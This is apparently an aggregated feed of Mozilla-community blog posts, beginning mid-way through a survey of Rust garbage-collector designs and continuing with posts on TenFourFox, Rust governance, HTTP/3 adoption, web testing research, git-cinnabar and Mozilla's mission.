For a while a couple of us worked on a way to make Rust itself extensible with a pluggable GC, using LLVM stack map support for finding roots. After all, if we know which types are GC-ish, we can include metadata on how to find roots for each function, similar to how Rust functions currently contain unwinding hooks to enable cleanly running destructors during a panic.

We never got around to figuring out a complete design, but you can find more information on what we figured out in my and Felix’s posts on this subject. Essentially, it involved a Trace trait with more generic trace methods, an auto-implemented Root trait that works similar to Send, and compiler machinery to keep track of which Root types are on the stack.

This is probably not too useful for people attempting to implement a GC, but I’m mentioning it for completeness’ sake.

Note that pre-1.0 Rust did have a builtin GC (@T, known as “managed pointers”), but IIRC in practice the cycle-management parts were not ever implemented so it behaved exactly like Rc<T>. I believe it was intended to have a cycle collector (I’ll talk more about that in the next section).

bacon-rajan-cc (and cycle collectors in general)

Nick Fitzgerald wrote bacon-rajan-cc to implement _“Concurrent Cycle Collection in Reference Counted Systems”__ by David F. Bacon and V.T. Rajan.

This is what is colloquially called a cycle collector; a kind of garbage collector which is essentially “what if we took Rc<T> but made it detect cycles”. Some people do not consider these to be tracing garbage collectors, but they have a lot of similar characteristics (and they do still “trace” through types). They’re often categorized as “hybrid” approaches, much like gc.

The idea is that you don’t actually need to know what the roots are if you’re maintaining reference counts: if a heap object has a reference count that is more than the number of heap objects referencing it, it must be a root. In practice it’s pretty inefficient to traverse the entire heap, so optimizations are applied, often by applying different “colors” to nodes, and by only looking at the set of objects that have recently have their reference counts decremented.

A crucial observation here is that if you only focus on potential garbage, you can shift your definition of “root” a bit, when looking for cycles you don’t need to look for references from the stack, you can be satisfied with references from any part of the heap you know for a fact is reachable from things which are not potential garbage.

A neat property of cycle collectors is while mark and sweep tracing GCs have their performance scale by the size of the heap as a whole, cycle collectors scale by the size of the actual garbage you have 7. There are of course other tradeoffs: deallocation is often cheaper or “free” in tracing GCs (amortizing those costs by doing it during the sweep phase) whereas cycle collectors have the constant allocator traffic involved in cleaning up objects when refcounts reach zero.

The way bacon-rajan-cc works is that every time a reference count is decremented, the object is added to a list of “potential cycle roots”, unless the reference count is decremented to 0 (in which case the object is immediately cleaned up, just like Rc). It then traces through this list; decrementing refcounts for every reference it follows, and cleaning up any elements that reach refcount 0. It then traverses this list again and reincrements refcounts for each reference it follows, to restore the original refcount. This basically treats any element not reachable from this “potential cycle root” list as “not garbage”, and doesn’t bother to visit it.

Cycle collectors require tighter control over the garbage collection algorithm, and have differing performance characteristics, so they may not necessarily be suitable for all use cases for GC integration in Rust, but it’s definitely worth considering!


Jason Orendorff’s cell-gc crate is interesting, it has a concept of “heap sessions”. Here’s a modified example from the readme:

use cell_gc::Heap;

// implements IntoHeap, and also generates an IntListRef type and accessors
struct IntList<'h> {
    head: i64,
    tail: Option<IntListRef<'h>>

fn main() {
    // Create a heap (you'll only do this once in your whole program)
    let mut heap = Heap::new();

    heap.enter(|hs| {
        // Allocate an object (returns an IntListRef)
        let obj1 = hs.alloc(IntList { head: 17, tail: None });
        assert_eq!(obj1.head(), 17);
        assert_eq!(obj1.tail(), None);

        // Allocate another object
        let obj2 = hs.alloc(IntList { head: 33, tail: Some(obj1) });
        assert_eq!(obj2.head(), 33);
        assert_eq!(obj2.tail().unwrap().head(), 17);

        // mutate `tail`

All mutation goes through autogenerated accessors, so the crate has a little more control over traffic through the GC. These accessors help track roots via a scheme similar to what gc does; where there’s an IntoHeap trait used for modifying root refcounts when a reference is put into and taken out of the heap via accessors.

Heap sessions allow for the heap to moved around, even sent to other threads, and their lifetime prevents heap objects from being mixed between sessions. This uses a concept called generativity; you can read more about generativity in _“You Can’t Spell Trust Without Rust” ch 6.3, by Alexis Beingessner, or by looking at the indexing crate.

Interlude: The similarities between async and GCs

The next two examples use machinery from Rust’s async functionality despite having nothing to do with async I/O, and I think it’s important to talk about why that should make sense. I’ve tweeted about this before: I and Catherine West figured this out when we were talking about her GC idea based on async.

You can see some of this correspondence in Go: Go is a language that has both garbage collection and async I/O, and both of these use the same “safepoints” for yielding to the garbage collector or the scheduler. In Go, the compiler needs to automatically insert code that checks the “pulse” of the heap every now and then, and potentially runs garbage collection. It also needs to automatically insert code that can tell the scheduler “hey now is a safe time to interrupt me if a different goroutine wishes to run”. These are very similar in principle – they’re both essentially places where the compiler is inserting “it is okay to interrupt me now” checks, sometimes called “interruption points” or “yield points”.

Now, Rust’s compiler does not automatically insert interruption points. However, the design of async in Rust is essentially a way of adding explicit interruption points to Rust. foo().await in Rust is a way of running foo() and expecting that the scheduler may interrupt the code in between. The design of Future and Pin<P> come out of making this safe and pleasant to work with.

As we shall see, this same machinery can be used for creating safe interruption points for GCs in Rust.


shifgrethor is an experiment by Saoirse to try and build a GC that uses Pin<P> for managing roots. They’ve written extensively on the design of shifgrethor on their blog. In particular, the post on rooting goes through how rooting works.

The basic design is that there’s a Root<'root> type that contains a Pin<P>, which can be immovably tied to a stack frame using the same idea behind pin-utilspin_mut!() macro:

let gc: Gc<'root, Foo> = root.gc(Foo::new());

The fact that root is immovable allows for it to be treated as a true marker for the stack frame over anything else. The list of rooted types can be neatly stored in an ordered stack-like vector in the GC implementation, popping when individual roots go out of scope.

If you wish to return a rooted object from a function, the function needs to accept a Root<'root>:

fn new<'root>(root: Root<'root>) -> Gc<'root, Self> {
    root.gc(Self {
        // ...

All GC’d types have a 'root lifetime of the root they trace back to, and are declared with a custom derive:

struct Foo<'root> {
    #[gc] bar: GcStore<'root, Bar>,

GcStore is a way to have fields use the rooting of their parent. Normally, if you wanted to put Gc<'root2, Bar<'root2>> inside Foo<'root1> you would not be able to because the lifetimes derive from different roots. GcStore, along with autogenerated accessors from #[derive(GC)], will set Bar’s lifetime to be the same as Foo when you attempt to stick it inside Foo.

This design is somewhat similar to that of Servo where there’s a pair of types, one that lets us refer to GC types on the stack, and one that lets GC types refer to each other on the heap, but it uses Pin<P> instead of a lint to enforce this safely, which is way nicer. Root<'root> and GcStore do a bunch of lifetime tweaking that’s reminiscent of Josephine’s rooting system, however there’s no need for an &mut JsContext type that needs to be passed around everywhere.


gc-arena is Catherine West’s experimental GC design for her Lua VM, luster.

The gc-arena crate forces all GC-manipulating code to go within arena.mutate() calls, between which garbage collection may occur.

struct TestRoot<'gc> {
    number: Gc<'gc, i32>,
    many_numbers: GcCell<Vec<Gc<'gc, i32>>>,

make_arena!(TestArena, TestRoot);

let mut arena = TestArena::new(ArenaParameters::default(), |mc| TestRoot {
    number: Gc::allocate(mc, 42),
    many_numbers: GcCell::allocate(mc, Vec::new()),

arena.mutate(|_mc, root| {
    assert_eq!(*((*root).number), 42);
    root.numbers.write(mc).push(Gc::allocate(mc, 0));

Mutation is done with GcCell, basically a fancier version of Gc<RefCell<T>>. All GC operations require a MutationContext (mc), which is only available within arena.mutate().

Only the arena root may survive between mutate() calls, and garbage collection does not happen during .mutate(), so rooting is easy – just follow the arena root. This crate allows for multiple GCs to coexist with separate heaps, and, similarly to cell-gc, it uses generativity to enforce that the heaps do not get mixed.

So far this is mostly like other arena-based systems, but with a GC.

The really cool part of the design is the gc-sequence crate, which essentially builds a Future-like API (using a Sequence trait) on top of gc-arena that can potentially make this very pleasant to use. Here’s a modified example from a test:

struct TestRoot<'gc> {
    test: Gc<'gc, i32>,

make_sequencable_arena!(test_sequencer, TestRoot);
use test_sequencer::Arena as TestArena;

let arena = TestArena::new(ArenaParameters::default(), |mc| TestRoot {
    test: Gc::allocate(mc, 42),

let mut sequence = arena.sequence(|root| {
    sequence::from_fn_with(root.test, |_, test| {
        if *test == 42 {
            Ok(*test + 10)
        } else {
            Err("will not be generated")
    .and_then(|_, r| Ok(r + 12))
    .and_chain(|_, r| Ok(sequence::ok(r - 10)))
    .then(|_, res| res.expect("should not be error"))
    .chain(|_, r| sequence::done(r + 10))
    .map(|r| sequence::done(r - 60))

loop {
    match sequence.step() {
        Ok((_, output)) => {
            assert_eq!(output, 4);
        Err(s) => sequence = s,

This is very similar to chained callback futures code; and if it could use the Future trait would be able to make use of async to convert this callback heavy code into sequential code with interrupt points using await. There were design constraints making Future not workable for this use case, though if Rust ever gets generators this would work well, and it’s quite possible that another GC with a similar design could be written, using async/await and Future.

Essentially, this paints a picture of an entire space of Rust GC design where GC mutations are performed using await (or yield if we ever get generators), and garbage collection can occur during those yield points, in a way that’s highly reminiscent of Go’s design.

Moving forward

As is hopefully obvious, the space of safe GC design in Rust is quite rich and has a lot of interesting ideas. I’m really excited to see what folks come up with here!

If you’re interested in reading more about GCs in general, “A Unified Theory of Garbage Collection” by Bacon et al and the GC Handbook are great reads.

Thanks to Andi McClure, Jason Orendorff, Nick Fitzgerald, and Nika Layzell for providing feedback on drafts of this blog post

  1. I’m also going to completely ignore the field of conservative stack-scanning tracing GCs where you figure out your roots by looking at all the stack memory and considering anything with a remotely heap-object-like bit pattern to be a root. These are interesting, but can’t really be made 100% safe in the way Rust wants them to be unless you scan the heap as well. 

  2. Which currently does not have support for concurrent garbage collection, but it could be added. 

  3. Some JNI-using APIs are also forced to have explicit rooting APIs to give access to things like raw buffers. 

  4. In general, finalizers in GCs are hard to implement soundly in any language, not just Rust, but Rust can sometimes be a bit more annoying about it. 

  5. Spolier: This is actually possible in Rust, and we’ll get into it further in this post! 

  6. Such hybrid approaches are common in high performance GCs; “A Unified Theory of Garbage Collection” by Bacon et al. covers a lot of the breadth of these approaches. 

  7. Firefox’s DOM actually uses a mark & sweep tracing GC mixed with a cycle collector for this reason. The DOM types themselves are cycle collected, but JavaScript objects are managed by the Spidermonkey GC. Since some DOM types may contain references to arbitrary JS types (e.g. ones that store callbacks) there’s a fair amount of work required to break cycles manually in some cases, but it has performance benefits since the vast majority of DOM objects either never become garbage or become garbage by having a couple non-cycle-participating references get released. 

Cameron KaiserTenFourFox FPR32b1 available

I decided not to post this on April Fools Day since a lot of people were hoping the last post was a mistimed April Fools prank, and it wasn't. For one thing, I've never worked that hard on an April Fools joke, even the time when I changed the printer READY messages all over campus to say INSERT FIVE CENTS.

Anyway, the beta for the final TenFourFox Feature Parity Release, FPR32, is now available (downloads, hashes, release notes). This release adds another special preference dialogue for auto reader view, allowing you to automatically jump to reader view for subpages or all pages of domains you enter. I also updated Readability, the underlying Reader View library, to the current tip and also refreshed the ATSUI font blocklist. It will become final on or about April 20 parallel to Firefox 88.

I received lots of kind messages which I have been replying to. Many people appreciated that they could use their hardware for longer, even if they themselves are no longer using their Power Macs, and I even heard about a iMac G4 that is currently a TenFourFox-powered kiosk. I'm willing to bet there are actually a number of these systems hauled out of the closet easily serving such purposes by displaying a ticker or dashboard that can be tweaked to render quickly.

Don't forget, though, that even after September 7 I will still make intermittent updates (primarily security-based) for my own use which will be public and you can use them too. However, as I mentioned, you'll need to build the browser yourself, and since it will only be on a rolling basis (I won't be doing specific versions or tags), you can decide how often you want to update your own local copy. I'll make a note here on the blog when I've done a new batch so that your feedreader can alert you if you aren't watching the Github repository already. The first such batch is a near certainty since it will be me changing the certificate roots to 91ESR.

If you come up with simpler or better build instructions, I'm all ears.

I'm also willing to point people to third-party builds. If you're able to do it and want to take on the task, and don't mind others downloading it, post in the comments. You declare how often you want to do it and which set of systems you want to do it for. The more builders the merrier so that the load can be shared and people can specialize in the systems they most care about.

As a last comment, a few people have asked what it would take to get later versions (52ESR, etc.) to run on Power Macs. Fine, here's a summarized to-do list. None of them are (probably) technically impossible; the real issue is the amount of time required and the ongoing burden needed, plus any unexpected regressions you'd incur. (See also the flap over the sudden Rust requirement for the Python cryptography library, an analogous situation which broke a number of other platforms of similar vintage.)

  • Upgrade gcc and validate it.
  • Transplant the 32-bit PowerPC JIT to 52's JavaScript. This isn't automatic because you would need to add any new code to the backend required by Ion, and there are some hacks in the source to fix various assumptions SpiderMonkey makes that have to be rechecked and carried forward. There are also some endian fixes. You could get around this by making it interpreter-only, but since much of the browser itself is written in JavaScript, everything will slow down, not just web pages. This task is additionally complicated by our post-45 changes which would need to be undone.
  • Transplant the local Cocoa widget changes and merge them with any additional OS support Mozilla added. There are a lot of these patches; some portions were completely rewritten for 10.4 or use old code I dragged along from version to version. A couple people proposed an X11-only version to get around this too. You should be able to do this, and it would probably work, but the code needs some adjustment to deal with the fact it's running on Mac OS X but not with a Cocoa widget system. There are a number of places you would need to manually patch, though this is mostly tedium and not terribly complex.
  • The 2D drawing backend changed from CoreGraphics to Skia for technical reasons. Unfortunately, Skia at the time had a lot of problems on big endian and didn't compile properly with 10.4. The former problem might have since been fixed upstream but the latter almost certainly wouldn't have been or would now be worse. You can get around this by using Cairo, but our CG backend was heavily customized, and you will take an additional performance hit on what was probably TenFourFox's worst performing section to begin with since we have no GPU acceleration. It may also be possible to patch the old CG backend back in but you would need to write any additional glue to deal with the higher-level API changes.
  • The ICU library required by JavaScript lacked Mozilla build system support for big-endian for a very long time. This was finally fixed in Firefox 80; you would need to backport this.
And then, assuming you want to go post-Firefox 54, there's Rust. Rust is not compatible with 32-bit PowerPC on OS X (it does work on other 32-bit PowerPC operating systems, but those don't run TenFourFox). Besides having to do any adjustments to Rust to emit code compliant with the PowerOpen ABI used by 32-bit PowerPC OS X, you will also have issues with any crates or code that require thread-local storage; OS X didn't support this until 10.7. There may be ways to emulate it and you get to figure those out. On top of that is the need for LLVM: David Fang struggled for years trying to get early versions to work on Tiger, and even MacPorts currently shows llvm-9 on 10.6 as "red", which does not bode well for 10.5 or 10.4. The issue seems to be missing dependencies and you get to figure those out too. I'm just not willing to maintain an entire compiler toolchain and infrastructure on top of maintaining a browser.

If you think I'm wrong about all this, rather than argue with me in the comments, today's your chance to prove it :)

Niko MatsakisMy “shiny future”

I’ve been working on the Rust project for just about ten years. The language has evolved radically in that time, and so has the project governance. When I first started, for example, we communicated primarily over the rust-dev mailing list and the #rust IRC channel. I distinctly remember coming into the Mozilla offices1 one day and brson excitedly telling me, “There were almost a dozen people on the #rust IRC channel last night! Just chatting! About Rust!” It’s funny to think about that now, given the scale Rust is operating at today.

Scaling the project governance

Scaling the governance of the project to keep up with its growing popularity has been a constant theme. The first step was when we created a core team (initially pcwalton, brson, and I) to make decisions. We needed some kind of clear decision makers, but we didn’t want to set up a single person as “BDFL”. We also wanted a mechanism that would allow us to include non-Mozilla employees as equals.2

Having a core team helped us move faster for a time, but we soon found that the range of RFCs being considered was too much for one team. We needed a way to expand the set of decision makers to include focused expertise from each area. To address these problems, aturon and I created RFC 1068, which expanded from a single “core team” into many Rust teams, each focused on accepting RFCs and managing a particular area.

As written, RFC 1068 described a central technical role for the core team3, but it quickly became clear that this wasn’t necessary. In fact, it was a kind of hindrance, since it introduced unnecessary bottlenecks. In practice, the Rust teams operated quite independently from one another. This independence enabled us to move rapidly on improving Rust; the RFC process – which we had introduced in 20144 – provided the “checks and balances” that kept teams on track.5 As the project grew further, new teams like the release team were created to address dedicated needs.

The teams were scaling well, but there was still a bottleneck: most people who contributed to Rust were still doing so as volunteers, which ultimately limits the amount of time people can put in. This was a hard nut to crack6, but we’ve finally seen progress this year, as more and more companies have been employing people to contribute to Rust. Many of them are forming entire teams for that purpose – including AWS, where I am working now. And of course I would be remiss not to mention the launch of the Rust Foundation itself, which gives Rust a legal entity of its own and creates a forum where companies can pool resources to help Rust grow.

My own role

My own trajectory through Rust governance has kind of mirrored the growth of the project. I was an initial member of the core team, as I said, and after we landed RFC 1068 I became the lead of the compiler and language design teams. I’ve been wearing these three hats until very recently.

In December, I decided to step back as lead of the compiler team. I had a number of reasons for doing so, but the most important is that I want to ensure that the Rust project continues to scale and grow. For that to happen, we need to transition from one individual doing all kinds of roles to people focusing on those places where they can have the most impact.7

Today I am announcing that I am stepping back from the Rust core team. I plan to focus all of my energies on my roles as lead of the language design team and tech lead of the AWS Rust Platform team.

Where we go from here

So now we come to my “shiny future”. My goal, as ever, is to continue to help Rust pursue its vision of being an accessible systems language. Accessible to me means that we offer strong safety guarantees coupled with a focus on ergonomics and usability; it also means that we build a welcoming, inclusive, and thoughtful community. To that end, I expect to be doing more product initiatives like the async vision doc to help Rust build a coherent vision for its future; I also expect to continue working on ways to scale the lang team, improve the RFC process, and help the teams function well.

I am so excited about all that we the Rust community have built. Rust has become a language that people not only use but that they love using. We’ve innovated not only in the design of the language but in the design and approach we’ve taken to our community. “In case you haven’t noticed…we’re doing the impossible here people!” So here’s to the next ten years!

  1. Offices! Remember those? Actually, I’ve been working remotely since 2013, so to be honest I barely do. 

  2. I think the first non-Mozilla member of the core team was Huon Wilson, but I can’t find any announcements about it. I did find this very nicely worded post by Brian Andersion about Huon’s departure though. “They live on in our hearts, and in our IRC channels.” Brilliant. 

  3. If you read RFC 1068, for example, you’ll see some language about the core team deciding what features to stabilize. I don’t think this happened even once: it was immediately clear that the teams were better positioned to make this decision. 

  4. The email makes this sound like a minor tweak to the process. Don’t be fooled. It’s true that people had always written “RFCs” to the mailing list. But they weren’t mandatory, and there was no real process around “accepting” or “rejecting” them. The RFC process was a pretty radical change, more radical I think than we ourselves even realized. The best part of it was that it was not optional for anyone, including core developers. 

  5. Better still, the RFC mechanism invites public feedback. This is important because no single team of people can really have expertise in the full range of considerations needed to design a language like Rust. 

  6. If you look back at my Rust roadmap posts, you’ll see that this has been a theme in every single one

  7. I kind of love these three slides from my Rust LATAM 2019 talk, which expressed the same basic idea, but from a different perspective. 

Daniel StenbergWhere is HTTP/3 right now?

tldr: the level of HTTP/3 support in servers is surprisingly high.

The specs

The specifications are all done. They’re now waiting in queues to get their final edits and approvals before they will get assigned RFC numbers and get published as such – they will not change any further. That’s a set of RFCs (six I believe) for various aspects of this new stack. The HTTP/3 spec is just one of those. Remember: HTTP/3 is the application protocol done over the new transport QUIC. (See http3 explained for a high-level description.)

The HTTP/3 spec was written to refer to, and thus depend on, two other HTTP specs that are in the works: httpbis-cache and https-semantics. Those two are mostly clarifications and cleanups of older HTTP specs, but this forces the HTTP/3 spec to have to get published after the other two, which might introduce a small delay compared to the other QUIC documents.

The working group has started to take on work on new specifications for extensions and improvements beyond QUIC version 1.

HTTP/3 Usage

In early April 2021, the usage of QUIC and HTTP/3 in the world is measured by a few different companies.

QUIC support

netray.io scans the IPv4 address space weekly and checks how many hosts that speak QUIC. Their latest scan found 2.1 million such hosts.

Arguably, the netray number doesn’t say much. Those two million hosts could be very well used or barely used machines.

HTTP/3 by w3techs

w3techs.com has been in the game of scanning web sites for stats purposes for a long time. They scan the top ten million sites and count how large share that runs/supports what technologies and they also check for HTTP/3. In their data they call the old Google QUIC for just “QUIC” which is confusing but that should be seen as the precursor to HTTP/3.

What stands out to me in this data except that the HTTP/3 usage seems very high: the top one-million sites are claimed to have a higher share of HTTP/3 support (16.4%) than the top one-thousand (11.9%)! That’s the reversed for HTTP/2 and not how stats like this tend to look.

It has been suggested that the growth starting at Feb 2021 might be explained by Cloudflare’s enabling of HTTP/3 for users also in their free plan.

HTTP/3 by Cloudflare

On radar.cloudflare.com we can see Cloudflare’s view of a lot of Internet and protocol trends over the world.

<figcaption>The last 30 days according to radar.cloudflare.com</figcaption>

This HTTP/3 number is significantly lower than w3techs’. Presumably because of the differences in how they measure.


The browsers

All the major browsers have HTTP/3 implementations and most of them allow you to manually enable it if it isn’t already done so. Chrome and Edge have it enabled by default and Firefox will so very soon. The caniuse.com site shows it like this (updated on April 4):

(Earlier versions of this blog post showed the previous and inaccurate data from caniuse.com. Not anymore.)


curl supports HTTP/3 since a while back, but you need to explicitly enable it at build-time. It needs to use third party libraries for the HTTP/3 layer and it needs a QUIC capable TLS library. The QUIC/h3 libraries are still beta versions. See below for the TLS library situation.

curl’s HTTP/3 support is not even complete. There are still unsupported areas and it’s not considered stable yet.

Other clients

Facebook has previously talked about how they use HTTP/3 in their app, and presumably others do as well. There are of course also other implementations available.

TLS libraries

curl supports 14 different TLS libraries at this time. Two of them have QUIC support landed: BoringSSL and GnuTLS. And a third would be the quictls OpenSSL fork. (There are also a few other smaller TLS libraries that support QUIC.)


The by far most popular TLS library to use with curl, OpenSSL, has postponed their QUIC work:

“It is our expectation that once the 3.0 release is done, QUIC will become a significant focus of our effort.”

At the same time they have delayed the OpenSSL 3.0 release significantly. Their release schedule page still today speaks of a planned release of 3.0.0 in “early Q4 2020”. That plan expects a few months from the beta to final release and we have not yet seen a beta release, only alphas.

Realistically, this makes QUIC in OpenSSL many months off until it can appear even in a first alpha. Maybe even 2022 material?


The Google powered OpenSSL fork BoringSSL has supported QUIC for a long time and provides the OpenSSL API, but they don’t do releases and mostly focus on getting a library done for Google. People outside the company are generally reluctant to use and depend on this library for those reasons.

The quiche QUIC/h3 library from Cloudflare uses BoringSSL and curl can be built to use quiche (as well as BoringSSL).


Microsoft and Akamai have made a fork of OpenSSL available that is based on OpenSSL 1.1.1 and has the QUIC pull-request applied in order to offer a QUIC capable OpenSSL flavor to the world before the official OpenSSL gets their act together. This fork is called quictls. This should be compatible with OpenSSL in all other regards and provide QUIC with an API that is similar to BoringSSL’s.

The ngtcp2 QUIC library uses quictls. curl can be built to use ngtcp2 as well as with quictls,

Is HTTP/3 faster?

I realize I can’t blog about this topic without at least touching this question. The main reason for adding support for HTTP/3 on your site is probably that it makes it faster for users, so does it?

According to cloudflare’s tests, it does, but the difference is not huge.

We’ve seen other numbers say h3 is faster shown before but it’s hard to find up-to-date performance measurements published for the current version of HTTP/3 vs HTTP/2 in real world scenarios. Partly of course because people have hesitated to compare before there are proper implementations to compare with, and not just development versions not really made and tweaked to perform optimally.

I think there are reasons to expect h3 to be faster in several situations, but for people with high bandwidth low latency connections in the western world, maybe the difference won’t be noticeable?


I’ve previously shown the slide below to illustrate what needs to be done for curl to ship with HTTP/3 support enabled in distros and “widely” and I think the same works for a lot of other projects and clients who don’t control their TLS implementation and don’t write their own QUIC/h3 layer code.

This house of cards of h3 is slowly getting some stable components, but there are still too many moving parts for most of us to ship.

I assume that the rest of the browsers will also enable HTTP/3 by default soon, and the specs will be released not too long into the future. That will make HTTP/3 traffic on the web increase significantly.

The QUIC and h3 libraries will ship their first non-beta versions once the specs are out.

The TLS library situation will continue to hamper wider adoption among non-browsers and smaller players.

The big players already deploy HTTP/3.


I’ve updated this post after the initial publication, and the biggest corrections are in the Chrome/Edge details. Thanks to immediate feedback from Eric Lawrence. Remaining errors are still all mine! Thanks also to Barry Pollard who filed the PR to update the previously flawed caniuse.com data.

Hacks.Mozilla.OrgA web testing deep dive: The MDN web testing report

For the last couple of years, we’ve run the MDN Web Developer Needs Assessment (DNA) Report, which aims to highlight the key issues faced by developers building web sites and applications. This has proved to be an invaluable source of data for browser vendors and other organizations to prioritize improvements to the web platform. This year we did a deep dive into web testing, and we are delighted to be able to announce the publication of this follow-on work, available at our insights.developer.mozilla.org site along with our other Web DNA publications.

Why web testing?

In the Web DNA studies for 2019 and 2020, developers ranked the need “Having to support specific browsers, (e.g., IE11)” as the most frustrating aspect of web development, among 28 needs. The 2nd and 3rd rankings were also related to browser compatibility:

  1. Avoiding or removing a feature that doesn’t work across browsers
  2. Making a design look/work the same across browsers

In 2020, we released our browser compatibility research results — a deeper dive into identifying specific issues around browser compatibility and pinpointing what can be done to mitigate these issues.

This year we decided to follow up with another deep dive focused on the 4th most frustrating aspect of developing for the web, “Testing across browsers.” It follows on nicely from the previous deep dive, and also concerns much-sought-after information.

You can download this report directly — see the Web Testing Report (PDF, 0.6MB).

A new question for 2020

Based on the 2019 ranking of “testing across browsers”, we introduced a new question to the DNA survey in 2020: “What are the biggest pain points for you when it comes to web testing?” We wanted to understand more about this need and what some of the underlying issues are.

Respondents could choose one or more of the following answers:

  • Time spent on manual testing (e.g. due to lack of automation).
  • Slow-running tests.
  • Running tests across multiple browsers.
  • Test failures are hard to debug or reproduce.
  • Lack of debug tooling support (browser dev tools or IDE integration).
  • Difficulty diagnosing performance issues.
  • Tests are difficult to write.
  • Difficult to set up an adequate test environment.
  • No pain points.
  • Other.

Results summary

7.5% of respondents (out of 6,645) said they don’t have pain points with web testing. For those who did, the biggest pain point is the time spent on manual testing.

To better understand the nuances behind these results, we ran a qualitative study on web testing. The study consisted of twenty one-hour interviews with web developers who took the 2020 DNA survey and agreed to participate in follow-up research.

The results will help browser vendors understand whether to accelerate work on WebDriver Bidirectional Protocol (BiDi) or if the unmet needs lie elsewhere. Our analysis on WebDriver BiDi is based on the assumption that the feature gap between single-browser test tooling and cross-browser test tooling is a source of pain. Future research on the struggles developers have will be able to focus the priorities and technical design of that specification to address the pain points.

Key Takeaways

  • In the 2020 Web DNA report, we included the results of a segmentation study. One of the seven segments that emerged was “Testing Technicians”. The name implies that the segment does testing and therefore finds frustration while doing tests. This is correct, but what’s also true is that developers commonly see a high entry barrier to testing, which contributes to their frustration.
  • Defining a testing workflow, choosing tools, writing tests, and running tests all take time. Many developers face pressure to develop and launch products under tight deadlines. Testing or not testing is a tradeoff between the perceived value that testing adds compared to the time it will take to implement.
  • Some developers are aware of testing but limited by their lack of knowledge in the area. This lack of knowledge is a barrier to successfully implementing a testing strategy. Other developers are aware of what testing is and how to do it, but they still consider it frustrating. Rather than lacking knowledge, this second group lacks the time and resources to run tests to the degree that they’d ideally like.
  • For some developers, what constitutes a test type is unclear. Additionally, the line between coding and testing can be blurry.
  • For developers who have established a testing workflow, the best way to describe how that came to be is evolutionary. The evolutionary workflow is generally being continuously improved.
  • Browser vendors assumed unit testing to be a common type of testing and that it’s a well-developed space without a lot of pain points. However, what we learned is that there are more challenges with unit testing code that runs in the browser than anticipated, and there’s the same time pressure as elsewhere, meaning it doesn’t happen as frequently as expected.
  • In the most general of summaries, one could conclude that testing should take less time than it does.
  • Stakeholders had assumed that developers want to test their code in as many browsers as they can and they’re just limited by the browsers their tools support. What we learned is that the decision of which browsers they support does not depend on the tools they use. Conversely, what browsers they support drives the decisions for which tools they use.8

The post A web testing deep dive: The MDN web testing report appeared first on Mozilla Hacks - the Web developer blog.

Mike HommeyAnnouncing git-cinnabar 0.5.7

Git-cinnabar is a git remote helper to interact with mercurial repositories. It allows to clone, pull and push from/to mercurial remote repositories, using git.

Get it on github.

These release notes are also available on the git-cinnabar wiki.

What’s new since 0.5.6?

  • Updated git to 2.31.1 for the helper.
  • When using git >= 2.31.0, git -c config=value ... works again.
  • Minor fixes.

Robert KaiserIs Mozilla Still Needed Nowadays?

tl;dr: Happy 23rd birthday, Mozilla. And for the question: yes.

Here's a bit more rambling on this topic...

First of all, the Mozilla project was officially started on March 31, 1998, which is 23 years ago today. Happy birthday to my favorite "dino" out there! For more background, take a look at my Mozilla History talk from this year's FOSDEM, and/or watch the "Code Rush" documentary that conserved that moment in time so well and also gives nice insight into late-90's Silicon Valley culture.

Now, while Mozilla initially was there to "act as the virtual meeting place for the Mozilla code" as Netscape was still there with the target to win back the browser market that was slipping over to Micosoft. The revolutionary stance to develop a large consumer application in the open along with the marketing of "hack - this technology could fall into the right hands" as well as the general novenly of the open-source movement back then - and last not least a very friendly community (as I could find out myself) made this young project grow fast to be more than a development vehicle for AOL/Netscape, though. And in 2003, a mission to "preserve choice and innovation on the Internet" was set up for the project, shortly after backed by a non-profit Mozilla Foundation, and then with an independently developed Firefox browser, implementing "the idea [...] to design the best web browser for most people" - and starting to take back the web from the stagnation and lack of choice represented by >95% of the landscape being dominated by Microsoft Internet Explorer.

The exact phrasing of Mozilla's mission has been massages a few times, but from the view of the core contributors, it always meant the same thing, it currently reads:
Our mission is to ensure the Internet is a global public resource, open and accessible to all. An Internet that truly puts people first, where individuals can shape their own experience and are empowered, safe and independent.
On the Foundation site, there's the sentence "It is Mozilla’s duty to ensure the internet remains a force for good." - also pretty much meaning the same thing with that, just in less specific terms. Of course, the spirit of the project was also put into 10 pretty concrete technical principles, prefaced by 4 social pledges, in the Mozilla Manifesto, which make it even more clear and concrete what the project sees as its core purpose.

So, if we think about the question whether we still need Mozilla nowadays, we should take a look if moving in that direction is still required and helpful, and if Mozilla is still able and willing to push those principles forward.

When quite a few communities I'm part of - or would like to be part of - are moving to Discord or are adding it as an additional option to Facebook groups, and I read the Terms of Services of those two tightly closed and privacy-unfriendly services, I have to conclude that the current Internet is not open, not putting people first, and I don't feel neither empowered, safe or independent in that space. When YouTube selects recommendations so I live in a weird bubble that pulls me into conspiracies and negativity pretty fast, I don't feel like individuals can shape their own experience. When watching videos stored on certain sites is cheaper or less throttled than other sources with any new data plan I can get for my phone, or when geoblocking hinders me from watching even a trailer of my favorite series, I don't feel like the Internet is equally accessible to all. Neither do I when political misinformation is targeted at certain groups of users in election ads on social networks without any transparency to the public. But I would long for that all to be different, and to follow the principles I talked of above. So, I'd say those are still required, and would be helpful to push for.

It all feels like we need someone to unfck the Internet right now more than ever. We need someone to collect info on what's wrong and how it could get better there. We need someone to educate users, companies and politicians alike on where the dangers are and how we can improve the digital space. We need someone who gives us a fast, private and secure alternative to Google's browser and rendering engine that dominates the Internet now, someone to lead us out of the monoculture that threatens to bring innovation to a grind. Someone who has protecting privacy of people as one of their primary principles, and continues work on additional ways of keeping people safe. And that's just the start. As the links on all those points show, Mozilla tries hard to do all that, and more.

I definitely think we badly need a Mozilla that works on all those issues, and we need a whole lot of other projects and people help in the space as well. Be it in advocacy, in communication, in technology (links are just examples), or in other topics.

Can all that actually succeed in improving the Internet? Well, it definitely needs all of us to help, starting with using products like Firefox, supporting organizations like Mozilla, spreading the word, maybe helping to build a community, or even to contribute where we can.

We definitely need Mozilla today, even 23 years after its inception. Maybe we need it more than ever, actually. Are you in?

CC-BY-SA The text of this post is licensed under Creative Commons BY-SA 4.0.

Henri SivonenA Look at Encoding Detection and Encoding Menu Telemetry from Firefox 86

Firefox gained a way to trigger chardetng from the Text Encoding menu in Firefox 86. In this post, I examine both telemetry from Firefox 86 related to the Text Encoding menu and telemetry related to chardetng running automatically (without the menu).

The questions I’d like to answer are:

  • Can we replace the Text Encoding menu with a single menu item that performs the function currently performed by the item Automatic in the Text Encoding menu? 

